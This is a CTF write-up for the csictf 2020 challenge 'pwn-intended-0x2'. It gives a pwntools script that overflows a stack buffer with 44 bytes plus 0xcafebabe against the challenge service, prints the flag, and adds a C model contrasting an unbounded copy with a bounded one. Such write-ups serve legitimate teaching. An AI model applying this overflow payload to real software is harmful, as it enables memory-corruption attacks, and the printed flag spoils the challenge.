Tags: pwn radare2 

This problem is nearly identical to [the last](https://ctftime.org/task/12463) with the only difference being the final comparison. It now checks `var_4h` for the value `0xcafebabe` instead of `0`.
```r2
0x004011ca 817dfcbebafe. cmp dword [var_4h], 0xcafebabe
```

To make our final exploit, we can send 44 bytes followed by `\xbe\xba\xfe\xca` (which is `0xcafebabe` with the correct endianness). Personally, I like using [pwntools](https://github.com/Gallopsled/pwntools/) to do the conversion, which gives the script below. `p32` is used to pack the 32-bit value into the bytes described.
```py
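from pwn import *

# Local target; the next line replaces it with the remote service.
p = process("./pwn-intended-0x2")
p = remote("chall.csivit.com", 30007) # Remove for local testing
# 44 filler bytes reach var_4h; p32() packs 0xcafebabe as 4 little-endian bytes.
p.sendline(b"A" * 44 + p32(0xcafebabe))
p.interactive()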
```

We get the flag: `csictf{c4n_y0u_re4lly_telep0rt?}`
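
The overwrite described above can be reproduced without the binary. The following is an added example, not the challenge's source or code from the original writeup: `struct frame` is a constructed model that assumes only the 44-byte offset and the `0xcafebabe` comparison from the text, and it contrasts an input-sized copy with one capped at the buffer.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define OFFSET 44            /* bytes from start of input to var_4h (from the writeup) */
#define MAGIC  0xcafebabeu   /* value the cmp at 0x004011ca tests for */

/* Constructed model of the stack frame: not the challenge's real source. */
struct frame {
    unsigned char buf[OFFSET];  /* input buffer plus any padding */
    unsigned char var_4h[4];    /* the dword compared against MAGIC */
};

/* Decode 4 bytes as a little-endian dword, the way x86 loads var_4h. */
static uint32_t le32(const unsigned char *b) {
    return (uint32_t)b[0] | (uint32_t)b[1] << 8 |
           (uint32_t)b[2] << 16 | (uint32_t)b[3] << 24;
}

/* Input-sized copy; clamped to the frame only so the model stays well-defined. */
static uint32_t read_unbounded(struct frame *f, const unsigned char *in, size_t n) {
    memset(f, 0, sizeof *f);
    if (n > sizeof *f) n = sizeof *f;
    memcpy(f, in, n);
    return le32(f->var_4h);
}

/* Bounded copy: length is capped at the buffer, so var_4h is untouched. */
static uint32_t read_bounded(struct frame *f, const unsigned char *in, size_t n) {
    memset(f, 0, sizeof *f);
    if (n > sizeof f->buf) n = sizeof f->buf;
    memcpy(f->buf, in, n);
    return le32(f->var_4h);
}

/* Build 44 filler bytes + MAGIC in little-endian order; returns its length. */
static size_t build_input(unsigned char *out) {
    memset(out, 'A', OFFSET);
    for (int i = 0; i < 4; i++) out[OFFSET + i] = (unsigned char)(MAGIC >> (8 * i));
    return OFFSET + 4;
}

int main(void) {
    struct frame f; unsigned char in[OFFSET + 4];
    size_t n = build_input(in);
    printf("unbounded: var_4h = 0x%08x\n", (unsigned)read_unbounded(&f, in, n));
    printf("bounded:   var_4h = 0x%08x\n", (unsigned)read_bounded(&f, in, n));
    return 0;
}
```

With the bounded copy the same 48-byte input leaves `var_4h` at its initial value, so the comparison fails.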

Original writeup (https://fluix.dev/blog/csictf-2020-pwn-intended/).